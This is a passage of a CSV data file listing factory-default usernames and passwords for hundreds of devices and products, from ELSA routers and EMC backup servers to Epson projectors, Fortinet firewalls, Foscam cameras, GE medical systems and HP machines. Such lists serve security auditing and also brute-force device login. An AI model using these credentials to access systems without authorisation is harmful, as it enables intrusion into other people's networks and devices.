Router,,Admin,,,,,\nelsa,LANCom Office ISDN Router,,Admin,,cisco,,,\nelsa,LANCom Office ISDN Router,1000,Telnet,,,Admin,,\nelsa,LANCom Office ISDN Router,1000,Telnet,,cisco,Admin,,\nelsa,LANCom Office ISDN Router,1100,Telnet,,,Admin,,\nelsa,LANCom Office ISDN Router,1100,Telnet,,cisco,Admin,,\nelsa,LANCom Office ISDN Router,800,Telnet,,,Admin,,\nelsa,LANCom Office ISDN Router,800,Telnet,,cisco,Admin,,\nemachines,notebook,,,emaq,4133,,,\nemc,Avamar Deduplication Backup Server,,,MCUser,MCUser1,,,\nemc,Avamar Deduplication Backup Server,,,admin,changeme,,,\nemc,Avamar Deduplication Backup Server,,,backuponly,backuponly1,,,\nemc,Avamar Deduplication Backup Server,,,backuprestore,backuprestore1,,,\nemc,Avamar Deduplication Backup Server,,,dpn,changeme,,,\nemc,Avamar Deduplication Backup Server,,,restoreonly,restoreonly1,,,\nemc,Avamar Deduplication Backup Server,,,root,8RttoTriz,,,\nemc,Avamar Deduplication Backup Server,,,root,changeme,,,\nemc,Avamar Deduplication Backup Server,,,viewuser,viewuser1,,,\neminent,EM4114,,,admin,admin,Administrator,,\nencad,XPO,,,,,,,\nencad,XPO,,Admin,,,,,\nencad,XPO,,Multi,,,Admin,,\nengenius,EAP-3660,,192.168.1.1,admin,admin,Admin,,\nengenius,ECB-3220,,192.168.1.1,admin,admin,Admin,Client Bridge Admin,\nengenius,ECB-3220,,192.168.1.2,admin,admin,Admin,Access Point Admin,\nengenius,ECB-3500,,192.168.1.1,admin,admin,Admin,,\nengenius,EOC-2610,,192.168.1.1,admin,admin,Admin,,\nengenius,ESR-6650,,192.168.0.1,admin,admin,Admin,,\nengenius,ESR-9752,,192.168.0.1,admin,admin,Admin,,\nenhydra,Multiserver,,,admin,enhydra,,,\nenhydra,Multiserver,,,admin,enhydra,Admin,,\nenox,PC BIOS,,,,xo11nE,,,\nenox,PC BIOS,,Admin,,xo11nE,,,\nenox,PC BIOS,,Console,,xo11nE,Admin,,\nenterasys,ANG-1105,,Admin,,netadmin,,,\nenterasys,ANG-1105,,Admin,admin,netadmin,,,\nenterasys,ANG-1105,,HTTP,admin,netadmin,Admin,default IP is 192.168.1.1,\nenterasys,ANG-1105,,Telnet,,netadmin,Admin,default IP is 192.168.1.1,\nenterasys,ANG-1105,,unknown,,netadmin,,,\nenterasys,ANG-1105,,unknown,admin,netadmin,,,\nenterasys,ANG-1105,unknown,HTTP,admin,netadmin,Admin,default IP is 192.168.1.1,\nenterasys,ANG-1105,unknown,Telnet,,netadmin,Admin,default IP is 192.168.1.1,\nenterasys,SecureStack A2,,,admin,,,,\nenterasys,Vertical Horizon,ANY,Multi,admin,,Admin,this works in telnet or http,\nenterasys,Vertical Horizon,VH-2402S,Multi,tiger,tiger123,Admin,,\nentrust,Get Access Service Control Agent,,4.x,admin,admin,,,\nentrust,GetAccess,4.x,http,admin,admin,Admin,,\nentrust,GetAccess,4.x,http,websecadm,changeme,Admin,Access to Admin Gui via /sek-bin/login.gas.bat,\nentrust,GetAccess,7.x,http,websecadm,changeme,Admin,Access to Admin Gui via /sek-bin/login.gas.bat,\nepiserverab,EPiServer Commerce,,,admin,store,,,\nepox,PC BIOS,,,,central,,,\nepox,PC BIOS,,Admin,,central,,,\nepox,PC BIOS,,Console,,central,Admin,,\nepson,BrightLink 455Wi,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX100,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX21,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX30,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX31,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX70,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX71,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,EX91,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,MegaPlex MG-50,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,MegaPlex MG-850HD,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,MovieMate 72,,,,000000,,,\nepson,MovieMate 85HD,,,,000000,,,\nepson,PowerLite 1220,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1716,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1725,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1751,,,,0000,,,\nepson,PowerLite 1760W,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1761W,,,,0000,,,\nepson,PowerLite 1771W,,,,0000,,,\nepson,PowerLite 1776W,,,,0000,,,\nepson,PowerLite 1810p,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1815p,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1880,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 1940W,,,EPSONWEB,admin,Admin,username in all caps - password lowercase,\nepson,PowerLite 1950,,,EPSONWEB,admin,Admin,username in all caps - password lowercase,\nepson,PowerLite 4100,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 4200W,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 450,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 54c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 9 bad tries,\nepson,PowerLite 6100i,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 61p,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 62c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 737c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 745c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 74c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 9 bad tries,\nepson,PowerLite 750c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 755c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 760c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 765c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 76c,,,,0000,,,\nepson,PowerLite 78,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 7800p,,,,0000,,,\nepson,PowerLite 81p,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 821p,,,,0000,,,\nepson,PowerLite 822p,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 825+,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 825,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 826W,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 82c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 83+,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 83V+,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 83c,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 84+,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 84,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 85+,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 85,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 905,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite 95,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite D6150,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite Home Cinema 700,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite Presenter,,,,000000,,,\nepson,PowerLite Pro G5650W,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite Pro G5750WU,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite Pro Z8255NL,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite S3,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite S4,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite S6,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite S9,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite W6,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite W7,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,PowerLite Z8000WUNL,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\nepson,VS400,,,,0000,,Projector will lock if you enter the wrong password 3 times; will brick permanently after 30 bad tries,\neq3,HomeMatic,,,root,MuZhlo9n%8!G,,,\nericsson,ACC,,,netman,netman,,,\nericsson,Any router,,,netman,netman,,all,\nericsson,Ericsson ACC,,,netman,netman,,,\nericsson,Ericsson ACC,,Multi,,,Admin,,\nericsson,Ericsson Acc,,,netman,netman,,,\nericsson,NPU,3 3b 3c 3d 1d 1c,serial or telnet,cli,Eri#css$oN@2,cli,,\nericsson,Tigris Platform,All,Multi,public,,Guest,,\nericsson,W20,,,user,user,,,\nericsson,W25,,192.168.0.1 or 10.0.0.138,user,NextG,Admin,,\nericsson,W30,,192.168.1.1,,user,Admin,,\nericsson,W35,,192.168.1.1,,user,Admin,,\nericsson,md110 pabx,,up-to-bc9,,help,,,\nericsson,md110 pabx,,varies depending on config minimal list access by default,,help,,,\nericsson,md110 pabx,up-to-bc9,Multi,,help,varies depending on config minimal list access by default,,\nesesixcomputergmbh,Thintune,2.4.38-32-D,Connect port 25072,root,jstwo,Admin,,\netech,ADSL Ethernet Router,Annex A v2,HTTP,admin,epicrouter,Admin,Password can also be password,\netech,Router,RTBR03,HTTP,,admin,Admin,1wan/4ports switch router,\netech,Router,v1,HTTP,,admin,Admin,,\netech,Wireless 11Mbps Router Model:WLRT03,,HTTP,,admin,Admin,,\netech,rtbr03,rtbr03,Admin,admin,admin,,,\neverfocus,ECOR 8F,,,admin,11111111,,,\neverfocus,PowerPlex,,Admin,admin,admin,,,\neverfocus,PowerPlex,,Admin,operator,operator,,,\neverfocus,PowerPlex,,Admin,supervisor,supervisor,,,\neverfocus,PowerPlex,,EDR1600,admin,admin,,,\neverfocus,PowerPlex,,EDR1600,operator,operator,,,\neverfocus,PowerPlex,,EDR1600,supervisor,supervisor,,,\neverfocus,PowerPlex,EDR1600,Multi,admin,admin,Admin,,\neverfocus,PowerPlex,EDR1600,Multi,operator,operator,Admin,,\neverfocus,PowerPlex,EDR1600,Multi,supervisor,supervisor,Admin,,\neverfocus,edsr400,,,Admin,admin,,,\nexabyte,Mag20,,,anonymous,Exabyte,,,\nexabyte,Magnum20,,FTP,anonymous,Exabyte,Admin,,\nexacq,Technologies NVR Server,,,admin,admin256,,,\nexacq,Technologies NVR Server,,,user,user5710,,,\nexindanetworks,1700,,Default login http://172.14.1.57,admin,exinda,Admin,,\nextended systems,Firewall,,,admin,admin,,,\nextended systems,Print Server,,,admin,extendnet,,,\nextendedsystems,ExtendNet 4000 / Firewall,,,admin,admin,,all Versions,\nextendedsystems,Print Servers,,,admin,extendnet,,,\nextreme networks,All Switches,,,admin,,,,\nextreme networks,All Switches,,Admin,admin,,,,\nextreme networks,Alpine,,,admin,,,,\nextreme networks,BlackDiamond,,,admin,,,,\nextreme networks,Summit,,,admin,,,,\nextreme networks,Switches,,,admin,,,,\nextreme networks,Switches,,Admin,admin,,,,\nextreme networks,Swithces,,,admin,,,,\nextreme networks,Swithces,,Admin,admin,,,,\nextremenetworks,All Switches,,Multi,admin,,Admin,,\nextremenetworks,Alpine,,,admin,,Admin,,\nextremenetworks,BlackDiamond,,,admin,,Admin,,\nextremenetworks,Summit,,,admin,,Admin,,\nextremenetworks,Switches,,,admin,,Admin,,\nextremenetworks,Swithces,,Multi,admin,,Admin,,\nezsystems,eZ Publish,,,admin,publish,,,\nf5,Big-IP 540,,Multi,root,default,Admin,,\nf5,Big-IP,9.12,http,admin,admin,Administrator,,\nfastwire,Fastwire Bank Transfer,,,fastwire,fw,,,\nfatwire,Analytics,,,firstsite,firstsite,,,\nfatwire,Analytics,,,fwadmin,xceladmin,,,\nfirebird,FirebirdSQL,,,SYSDBA,masterkey,,,\nflowpoint,100 IDSN,,,admin,admin,,,\nflowpoint,100 IDSN,,Admin,admin,admin,,,\nflowpoint,100 IDSN,,Telnet,admin,admin,Admin,,\nflowpoint,2200 SDSL,,,admin,admin,,,\nflowpoint,2200 SDSL,,Admin,admin,admin,,,\nflowpoint,2200 SDSL,,Telnet,admin,admin,Admin,,\nflowpoint,40 IDSL,,,admin,admin,,,\nflowpoint,40 IDSL,,Admin,admin,admin,,,\nflowpoint,40 IDSL,,Telnet,admin,admin,Admin,,\nflowpoint,DSL,,,,password,,,\nflowpoint,DSL,,2000,admin,admin,,,\nflowpoint,DSL,,Admin,,password,,,\nflowpoint,DSL,,Admin,admin,admin,,,\nflowpoint,DSL,,Telnet,,password,Admin,Installed by Covad,\nflowpoint,DSL,2000,Telnet,admin,admin,Admin,,\nflowpoint,Flowpoint DSL,,,admin,admin,Admin,,\nflowpoint,Flowpoint/2000 ADSL,,,,,,,\nflowpoint,Flowpoint/2000 ADSL,,Admin,,,,,\nflowpoint,Flowpoint/2000 ADSL,,Telnet,,,Admin,,\nfortigate,Fortinet firewall,,,admin,no password,,,\nfortinet,FortiGate 300A,n/d,Multi,admin,no password,HTTP,,\nfortinet,FortiGate firewall,,Multi,admin,no password,,,\nfortinet,FortiGate,,Telnet,admin,,Admin,,\nfortinet,FortiGate,,serial console,maintainer,pbcpbn(add serial number),Admin,,\nfortinet,FortiGate-50B,,192.168.1.99,admin,,Admin,,\nfortinet,FortiGate-60 ADSL,,192.168.1.2,admin,,Admin,,\nfortinet,FortiGate-60,,192.168.1.99 or 192.168.1.2 or 10.0.0.1 or 10.10.10.1,admin,,Admin,,\nfortinet,FortiGate-60B,,192.168.1.99,admin,,Admin,,\nfortinet,FortiWifi-50B,,192.168.1.99,admin,,Admin,,\nfortinet,FortiWifi-60B,,192.168.1.99,admin,,Admin,,\nfortinet,Fortigate 300A,,HTTP SSH,admin,no password,,,\nfoscam,FI8601W,H.264 Series,http,admin,admin,admin,,\nfoscam,FI8601W,H.264 Series,http,guest,guest,guest,,\nfoscam,FI8601W,H.264 Series,http,user,user,user,,\nfoscam,FI8602W,H.264 Series,http,admin,admin,admin,,\nfoscam,FI8602W,H.264 Series,http,guest,guest,guest,,\nfoscam,FI8602W,H.264 Series,http,user,user,user,,\nfoscam,FI8608W,H.264 Series,http,admin,admin,admin,,\nfoscam,FI8608W,H.264 Series,http,guest,guest,guest,,\nfoscam,FI8608W,H.264 Series,http,user,user,user,,\nfoscam,FI8620,H.264 Series,http,admin,admin,admin,,\nfoscam,FI8620,H.264 Series,http,guest,guest,guest,,\nfoscam,FI8620,H.264 Series,http,user,user,user,,\nfoscam,FI8904W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8905E,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8905W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8906W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8907W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8909W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8910E,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8910W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8916W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8918W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI8918\\FI8918W,,,admin,,,,\nfoscam,FI8919W,MJPEG Series,http,admin,,Administrator,,\nfoscam,FI9801W,H.264 Series,http,admin,,Administrator,,\nfoscam,FI9802W,H.264 Series,http,admin,,Administrator,,\nfoscam,FI9805W,H.264 Series,http,admin,,Administrator,,\nfoscam,FI9818W,H.264 Series,http,admin,,Administrator,,\nfoscam,FI9820W,H.264 Series,http,admin,admin,admin,,\nfoscam,FI9820W,H.264 Series,http,guest,guest,guest,,\nfoscam,FI9820W,H.264 Series,http,user,user,user,,\nfoscam,FI9821W,H.264 Series,http,admin,admin,admin,,\nfoscam,FI9821W,H.264 Series,http,guest,guest,guest,,\nfoscam,FI9821W,H.264 Series,http,user,user,user,,\nfoundry networks,IronView Network Manager,,Version 01.6.00a(service pack) 0620031754,admin,admin,,,\nfoundry networks,ServerIron,,,,,,,\nfoundrynetworks,IronView Network Manager,Version 01.6.00a(service pack) 0620031754,HTTP,admin,admin,Admin,,\nfoundrynetworks,ServerIron,,,,,Admin,,\nfreenetantennas,UltraWAP-G,,192.168.2.1,admin,1234,Admin,,\nfreenetantennas,UltraWAP-N150,,192.168.2.1,admin,1234,Admin,,\nfreenetantennas,UltraWAP-N300,,192.168.2.1,admin,1234,Admin,,\nfreepbx,FreePBX,,,admin,admin,Admin,,\nfreetech,PC BIOS,,,,Posterie,,,\nfreetech,PC BIOS,,Admin,,Posterie,,,\nfreetech,PC BIOS,,Console,,Posterie,Admin,,\nfujitsusiemens,Routers,,HTTP,,connect,Admin,,\nfujixerox,DocuCentre SC2020,all versions,console,11111,x-admin,Admin,,\nfujixerox,DocuPrint 3055,2.01E+11,http://10.0.14.50,,,admin,,\nfujixerox,DocuPrint 3055,200911121222,http://10.0.14.50,,,admin,,\nfujixerox,DocuPrint C3290 FS,all versions,web interface,11111,x-admin,Admin,,\nfujixerox,Document Centre C450,,console,11111,x-admin,,,\nfujixerox,Document Centre C450,,console,11111,x-admin,,http://www.support.xerox.com/SRVS/CGI-BIN/WEBCGI.EXE/,\nfunk software,Steel Belted Radius,,3.x,admin,radius,,,\nfunk software,Steel Belted Radius,,Admin,admin,radius,,,\nfunksoftware,Steel Belted Radius,3.x,Proprietary,admin,radius,Admin,,\nfunksoftware,Steel Belted Radius,450,,admin,radius,Admin,,\ngalacticomm,Major BBS,,,Sysop,Sysop,,,\ngalacticomm,Major BBS,,Admin,Sysop,Sysop,,,\ngalacticomm,Major BBS,,Multi,Sysop,Sysop,Admin,,\ngandalf,XMUX,,,,console,,,\ngandalf,XMUX,,,,gandalf,,,\ngandalf,XMUX,,,,system,,,\ngandalf,XMUX,,,,xmux,,,\ngateway,WGR-200 Router,,,admin,admin,Admin,,\ngateway,WGR-250 Router,,,admin,admin,Admin,,\nge,Data management system,,,administrator,Never!Mind,,,\nge,Data management system,,,museadmin,Muse!Admin,,,\nge,Data management system,01/02/2003,Console,administrator,Never!Mind,,,\nge,Data management system,01/02/2003,Console,museadmin,Muse!Admin,,,\nge,Data management system,1/2/3,Console,administrator,Never!Mind,,,\nge,Data management system,1/2/3,Console,museadmin,Muse!Admin,,,\nge,Enterprise Archive,,,administrator,eaadmin,,,\nge,Enterprise Archive,02-Jan,Console,administrator,eaadmin,,,\nge,Enterprise Archive,1/2,Console,administrator,eaadmin,,,\nge,Image management system,,,administrator,gemnet,,,\nge,Image management system,01/02/2003,Console,administrator,gemnet,,,\nge,Image management system,1/2/3,Console,administrator,gemnet,,,\nge,Maclab,,,mlcltechuser,mlcl!techuser,,,\nge,Maclab,1,Console,mlcltechuser,mlcl!techuser,,,\ngeekadsl,Q31,,,admin,geekadsl,Admin,,\ngeekadsl,Q51,,,admin,geekadsl,Admin,,\ngeeklog,Geeklog,,1.3.x,username,password,,,\ngeeklog,Geeklog,1.3.x,MySQL,username,password,,,\ngeneral instruments,Cable Modem,,,test,test,,,\ngeneralinstruments,SB2100D Cable Modem,,,test,test,,,\ngericom,Phoenix,,Multi,Administrator,,Admin,,\ngesecurity,Integrated Configuration Tool,,,install,install,,,\ngiga,8ippro1000,,Multi,Administrator,admin,Admin,,\ngigabyte,GN-B49G,,,admin,admin,,,\ngigabyte,GN-B49G,,HTTP,admin,admin,,,\ngigabyte,GN-BR01G,,ip address,admin,admin,,,\nglftpd,glftpd,1.32,Other,glftpd,glftpd,ftp,,\nglobespanvirata,GS8100,,,DSL,DSL,Admin,,\nglobespanvirata,Viking,,Telnet,root,root,admin,,\nglobespanvirata,Viking,,admin,root,root,,,\nglobespanvirata,all models,all versions,http://192.168.1.1,WebAdmin,,,,\ngonet,,,,fast,abd234,,,\ngossamerthreads,dbMan,,,admin,admin,Change/Delete Data in Database,,\ngossamerthreads,dbMan,,,author,author,Change/Delete Data in Database,,\ngossamerthreads,dbMan,,,guest,guest,Change/Delete Data in Database,,\ngrandstreamnetworks,BudgeTone 100 series,,http,,admin,Admin,,\ngrandstreamnetworks,GXP-2130,,http,admin,admin,Admin,,\ngrandstreamnetworks,GXP-2130,,http,user,123,User,,\ngrandstreamnetworks,GXP-2135,,http,admin,admin,Admin,,\ngrandstreamnetworks,GXP-2135,,http,user,123,User,,\ngrandstreamnetworks,GXP-2140,,http,admin,admin,Admin,,\ngrandstreamnetworks,GXP-2140,,http,user,123,User,,\ngrandstreamnetworks,GXP-2160,,http,admin,admin,Admin,,\ngrandstreamnetworks,GXP-2160,,http,user,123,User,,\ngrandstreamnetworks,GXP-2170,,http,admin,admin,Admin,,\ngrandstreamnetworks,GXP-2170,,http,user,123,User,,\ngrandstreamnetworks,GXV-3000 IP Video Phone,1.0.0.24,,,123,Config (End User),,\ngrandstreamnetworks,GXV-3000 IP Video Phone,1.0.0.24,,,admin,Config (Advanced User),,\ngrandstreamnetworks,GXV3610,,DHCP,admin,admin,Admin,,\ngrandstreamnetworks,GXV3611,,DHCP,admin,admin,Admin,,\ngrandstreamnetworks,GXV3662,,DHCP,admin,admin,Admin,,\ngrandstreamnetworks,GXV3672,,DHCP,admin,admin,Admin,,\ngrandstreamnetworks,GXV3674,,DHCP,admin,admin,Admin,,\ngrandstreamnetworks,GXW4004,,,,123,User level access,,\ngrandstreamnetworks,GXW4004,,,,admin,Admin,,\ngrandstreamnetworks,GXW4008,,,,123,User level access,,\ngrandstreamnetworks,GXW4008,,,,admin,Admin,,\ngrandstreamnetworks,GXW4104,,,,123,User level access,,\ngrandstreamnetworks,GXW4104,,,,admin,Admin,,\ngrandstreamnetworks,GXW4108,,,,123,User level access,,\ngrandstreamnetworks,GXW4108,,,,admin,Admin,,\ngrandstreamnetworks,GXW4216,,http,,123,User level access,,\ngrandstreamnetworks,GXW4216,,http,,admin,Admin,,\ngrandstreamnetworks,GXW4224,,http,,123,User level access,,\ngrandstreamnetworks,GXW4224,,http,,admin,Admin,,\ngrandstreamnetworks,GXW4232,,http,,123,User level access,,\ngrandstreamnetworks,GXW4232,,http,,admin,Admin,,\ngrandstreamnetworks,GXW4248,,http,,123,User level access,,\ngrandstreamnetworks,GXW4248,,http,,admin,Admin,,\ngrandstreamnetworks,HandyTone 286,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone 286,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone 286,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone 386,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone 386,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone 386,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone 486,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone 486,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone 486,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone 488,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone 488,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone 488,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone 496,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone 496,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone 496,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone Budgetone-100 IP Phone,,HTTP,,admin,administrator,,\ngrandstreamnetworks,HandyTone GXP-2000,,HTTP,Administrator,admin,Admin,,\ngrandstreamnetworks,HandyTone GXP-2000,,HTTP,End User,,,,\ngrandstreamnetworks,HandyTone GXP-2000,,HTTP,End User,123,,,\ngrandstreamnetworks,HandyTone-486,,,End User,123,,,\ngrandstreamnetworks,HandyTone-486,,,admin,admin,,,\ngreatspeed,DUO,,,admin,broadband,,,\ngreatspeed,DUO,,HTTP,admin,broadband,,,\nguardone,BizGuard,,,n.a,guardone,,,\nguardone,BizGuard,,multi,,guardone,Admin,,\nguardone,Restrictor,,,,guardone,,,\nguardone,Restrictor,,multi,,guardone,Admin,,\ngvc,e800/rb4,,HTTP,Administrator,admin,Admin,,\nh2o project,Medialibrary,,,admin,admin,,,\nh2oproject,Medialibrary,,HTTP,admin,admin,Admin,,\nharris,DATU,,DTMF,,1111,,,\nharris,DATU,,DTMF,,1234,,,\nharris,DATU,,DTMF,,2345,,,\nharris,DATU,,DTMF,,4300,,,\nharris,DATU,,DTMF,,7373,,,\nharris,MAU,,Modem,,4372266,,,\nharris,SASS,,DTMF,,1111,,,\nharris,SASS,,DTMF,,1122,,,\nhawlett-packard,HP Omnibook 2100,,,,,,,\nhayes,Century,,MR200,system,isp,,,\nhayes,Century,MR200,,system,isp,Admin,,\nhemoco,Lansweeper,,,lansweeperuser,mysecretpassword0*,,,\nhewlett-packard,CommandView SDM,,Secure Manager,,AUTORAID,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,ADVMAIL,HP,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,ADVMAIL,HPOFFICE DATA,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPONLY,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPP187 SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,HPWORD PUB,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,LOTUS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,MANAGER,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,MGR,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,SERVICE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,FIELD,SUPPORT,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,FIELD.SUPPORT,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,MANAGER.SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,MGR.SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,HELLO,OP.OPERATOR,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,HPOFFICE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,MAIL,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,MPE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,REMOTE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MAIL,TELESUP,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,COGNOS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,HPOFFICE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,ITF3000,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,SECURITY,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,TCH,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MANAGER,TELESUP,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGE,VESOFT,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CAROLIAN,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CCC,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CNAS,,,\nhewlett-packard,HP 2000/3000 